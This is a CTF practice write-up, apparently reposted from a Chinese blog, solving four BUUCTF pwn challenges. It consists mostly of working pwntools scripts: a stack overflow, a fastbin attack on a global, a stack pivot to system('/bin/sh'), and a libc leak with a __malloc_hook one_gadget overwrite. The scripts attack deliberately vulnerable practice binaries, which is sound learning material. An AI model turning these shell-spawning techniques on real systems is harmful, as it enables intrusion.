

PWN-PRACTICE-BUUCTF-16

發(fā)布時(shí)間:2023/12/10 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-16 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

PWN-PRACTICE-BUUCTF-16

    • mrctf2020_easyoverflow
    • hitcontraining_magicheap
    • ciscn_2019_s_4
    • 0ctf_2017_babyheap

mrctf2020_easyoverflow

覆蓋main函數中的局部變量v5，使之等於"n0t_r3@11y_f1@g"。輸入緩衝區到v5的偏移為0x30字節（見payload的填充長度），偏移與該二進制綁定。

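"""mrctf2020_easyoverflow: plain stack overflow into the compared local.

v5 in main() has to end up equal to "n0t_r3@11y_f1@g"; the input buffer
lies 0x30 bytes before it, so padding followed by the literal overwrites
it. The 0x30 offset is specific to this binary.
"""
from pwn import *

# BUUCTF practice instance; swap for process("./...") to run locally.
r = remote("node4.buuoj.cn", 29521)

# Explicit bytes: on Python 3 pwntools expects bytes for send*(); a str
# payload only works through the implicit (deprecated) encoding path.
payload = b"a" * 0x30 + b"n0t_r3@11y_f1@g"
r.sendline(payload)
r.interactive()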

hitcontraining_magicheap

參考:picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap

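"""hitcontraining_magicheap: heap overflow -> fastbin attack on a global.

Menu: 1 create, 2 edit, 3 delete, 4869 hidden option (presumably the
one that spawns a shell once a global "magic" value is large enough).
The edit primitive lets us overwrite the next chunk's header, so a
freed 0x70-size chunk's fd is pointed at a fake chunk forged just below
the global pointer array; malloc then returns a pointer into .bss and
the following write sets the global to 0x1306.

All addresses are from the non-PIE binary (heaparray = 0x6020C0).
This is a classic fastbin attack; it relies on a glibc without tcache
and on the fake 0x71 size passing the fastbin size check.

Python 3 fix: the original mixed str and bytes (str + p64() is a
TypeError); everything sent is bytes now.
"""
from pwn import *

io = remote("node4.buuoj.cn", 27011)
# io = process("./magicheap")
elf = ELF("./magicheap")


def create(size, content):
    """Menu 1: allocate `size` bytes and fill them with `content` (bytes)."""
    io.sendlineafter(b"choice :", b"1")
    io.sendlineafter(b"Size of Heap : ", str(size).encode())
    io.sendlineafter(b"Content of heap:", content)


def edit(index, size, content):
    """Menu 2: rewrite entry `index` with `size` bytes of `content`.

    The exploit passes a `size` larger than the chunk, so this is the
    overflow primitive (the binary evidently does not bound it).
    """
    io.sendlineafter(b"choice :", b"2")
    io.sendlineafter(b"Index :", str(index).encode())
    io.sendlineafter(b"Size of Heap : ", str(size).encode())
    io.sendlineafter(b"Content of heap : ", content)


def delete(index):
    """Menu 3: free entry `index`."""
    io.sendlineafter(b"choice :", b"3")
    io.sendlineafter(b"Index :", str(index).encode())


def getshell():
    """Hidden menu option 4869."""
    io.sendlineafter(b"choice :", b"4869")


# Global chunk-pointer array in .bss (from the binary).
heaparray = 0x00000000006020C0
# Fake fastbin chunk at heaparray - 0x38 + 5 = 0x60208d (the original
# script called this fake_chunk_prev_size, which it is not). The spot is
# chosen so that the size field read there passes the 0x70 fastbin
# size check -- verify with gdb (`x/2gx 0x60208d`). Its user area starts
# at 0x60209d, 3 bytes before 0x6020a0, which is where the final write
# lands.
fake_chunk = heaparray - 0x38 + 5
# gdb.attach(io)
# pause()

create(0x10, b"a" * 8)  # chunk0
create(0x10, b"b" * 8)  # chunk1
create(0x60, b"c" * 8)  # chunk2: 0x70-size chunk -> fastbin when freed

delete(2)  # chunk2 -> fastbin[0x70]; its fd is what gets poisoned

# Overflow from chunk1 over chunk2's header: keep size 0x71 so the
# fastbin check still passes, and point fd at the fake chunk.
payload = b"b" * 0x10 + p64(0) + p64(0x71) + p64(fake_chunk)
edit(1, len(payload), payload)

create(0x60, b"c" * 8)  # chunk2 comes back first ...
create(0x60, b"d" * 8)  # ... then malloc hands out the fake chunk in .bss
# NOTE(review): if create() fills the first empty slot, chunk2 is index 2
# again and the fake chunk is index 3, so edit(2, ...) below writes into
# the real chunk2. The b"d"*8 content of the second create already covers
# 0x60209d..0x6020a5, i.e. the target at 0x6020a0, which may be what
# actually satisfies the 4869 check -- confirm in gdb before relying on
# the edit.
payload = b"d" * 3 + p64(0x1305 + 1)  # 0x1306 over the global at 0x6020a0
edit(2, len(payload), payload)

getshell()
io.interactive()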

ciscn_2019_s_4

先利用輸入回顯泄露一個棧地址，據此算出輸入緩衝區的位置，再通過覆蓋保存的ebp與返回地址（leave; ret）把棧遷移到該緩衝區，執行其中構造的 system("/bin/sh") 調用。

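"""ciscn_2019_s_4: leak a stack address, then pivot the stack into our
own input buffer (leave; ret) to call system("/bin/sh").

32-bit, non-PIE; gadget addresses are taken from this binary. The
program echoes the name back, and 12 bytes after our 'bbbb' marker a
stack pointer follows; the input buffer is 0x50 below it
(input_stk_offset, found with gdb). The second input builds a fake
frame in that buffer and overwrites saved ebp / ret with its address
and a `leave; ret` gadget.

Python 3 fixes: all payloads are bytes (str + p32() is a TypeError),
and the leak uses recvn() so a fragmented reply cannot desync it.
"""
from pwn import *

context.log_level = "debug"
# io = process('./ciscn_s_4')
io = remote('node4.buuoj.cn', 28112)
elf = ELF('./ciscn_s_4')

input_stk_offset = 0x50  # leaked pointer - start of our input buffer
leave_ret = 0x080484b8   # leave ; ret
system = 0x08048559      # see the frame layout note below
# gdb.attach(io, "break * 0x080485CD")

io.recvuntil(b'your name?\n')
payload = b'a' * (40 - 4) + b'b' * 4
io.send(payload)
io.recvuntil(b'bbbb')
# recvn(), not recv(): recv(n) returns *up to* n bytes, so a short read
# would shift the leak and hand u32() fewer than 4 bytes.
io.recvn(12)
stk = u32(io.recvn(4))
input_stk = stk - input_stk_offset
io.recvuntil(b'\n')

# Fake frame laid out at input_stk:
#   +0   'aaaa'          popped into ebp by the pivot gadget's `leave`
#   +4   system          the gadget's `ret` lands here
#   +8   input_stk+12    pointer to the "/bin/sh" string
#   +12  "/bin/sh\0"
# For +8 to be system's argument ([esp+4] on entry), 0x08048559 must
# itself push a return address, i.e. be a `call system` site rather than
# system@plt (which would expect a dummy return slot first) -- confirm
# against the disassembly.
payload = b'a' * 4 + p32(system) + p32(input_stk + 12) + b'/bin/sh\x00'
payload = payload.ljust(0x28, b'\x00')  # pad up to the saved-ebp slot
payload += p32(input_stk)               # saved ebp -> our buffer
payload += p32(leave_ret)               # ret -> leave; ret: esp = input_stk
io.send(payload)
io.interactive()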

0ctf_2017_babyheap

參考:0ctf_2017_babyheap

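"""0ctf_2017_babyheap: overlapping chunks -> unsorted-bin libc leak ->
fastbin attack on __malloc_hook -> one_gadget.

Target libc is ./libc-2.23-16-x64.so (no tcache, unprotected fastbin
fd), so the numeric offsets below are tied to that file:
  0x3c4b78  fd of a freed 0x90 chunk relative to libc base
            (main_arena+88 in this libc -- verify in gdb)
  0x4526a   a one_gadget in this libc
Per the original note, allocations are calloc'd (zeroed), which is why
chunk 2's header has to be re-written after the overlapping allocation.

Python 3 fix: the original mixed str and bytes (str + p64() is a
TypeError); everything sent or matched is bytes now.
"""
from pwn import *

context.log_level = "debug"
io = remote("node4.buuoj.cn", 28235)
# io = process("./0ctf_2017_babyheap")
elf = ELF("./0ctf_2017_babyheap")
libc = ELF("./libc-2.23-16-x64.so")


def alloc(size):
    """Command 1: allocate `size` bytes (slot index chosen by the program)."""
    io.sendlineafter(b"Command: ", b"1")
    io.sendlineafter(b"Size: ", str(size).encode())


def fill(index, size, content):
    """Command 2: write `size` bytes of `content` into slot `index`.

    `size` is not bounded by the chunk, which is the overflow primitive
    this exploit relies on.
    """
    io.sendlineafter(b"Command: ", b"2")
    io.sendlineafter(b"Index: ", str(index).encode())
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendlineafter(b"Content: ", content)


def free(index):
    """Command 3: free slot `index`."""
    io.sendlineafter(b"Command: ", b"3")
    io.sendlineafter(b"Index: ", str(index).encode())


def dump(index):
    """Command 4: print the contents of slot `index`."""
    io.sendlineafter(b"Command: ", b"4")
    io.sendlineafter(b"Index: ", str(index).encode())


# gdb.attach(io)
# pause()
alloc(0x10)  # 0
alloc(0x10)  # 1
alloc(0x80)  # 2  chunk size 0x90: unsorted bin (not fastbin) when freed
alloc(0x20)  # 3
alloc(0x60)  # 4  chunk size 0x70: fastbin
alloc(0x10)  # 5  trailing chunk (presumably keeps the others off the top chunk)
# pause()

# Overflow from chunk 0 into chunk 1's size field: 0x21 -> 0xb1, so
# chunk 1 now spans chunk 2 as well (0x20 + 0x90 = 0xb0).
payload = b"a" * 0x18 + p64(0xb1)
fill(0, len(payload), payload)
free(1)
alloc(0xa0)  # 1: the enlarged chunk, overlapping chunk 2 (calloc zeroes it)
# Restore chunk 2's header (prev_size 0, size 0x91) through the overlap
# so free(2) still sees a well-formed 0x90 chunk.
payload = b"b" * 0x10 + p64(0) + p64(0x91)
fill(1, len(payload), payload)
free(2)      # -> unsorted bin; fd/bk now point into main_arena
dump(1)      # chunk 1 covers chunk 2's fd, so this leaks it
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x3c4b78
print(hex(libc_base))
malloc_hook = libc_base + libc.sym["__malloc_hook"]
print(hex(malloc_hook))
# pause()

# Fastbin attack: free chunk 4 (0x70 bin), then overflow from chunk 3
# over its header, keeping size 0x71 and pointing fd at a fake chunk at
# __malloc_hook-0x23 -- the well-known spot where the size field reads
# as 0x7f and passes the fastbin size check (verify with gdb).
free(4)
payload = b"c" * 0x20 + p64(0) + p64(0x71) + p64(malloc_hook - 0x23)
fill(3, len(payload), payload)
alloc(0x60)  # 2: chunk 4 comes back
alloc(0x60)  # 4: the fake chunk inside libc's data
one_gadget = libc_base + 0x4526a
# Fake chunk data starts at __malloc_hook-0x13: 0x13 bytes of padding,
# then the hook itself.
payload = b"\x00" * 0x13 + p64(one_gadget)
fill(4, len(payload), payload)
# pause()
alloc(1)     # any malloc now runs __malloc_hook -> one_gadget
io.interactive()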
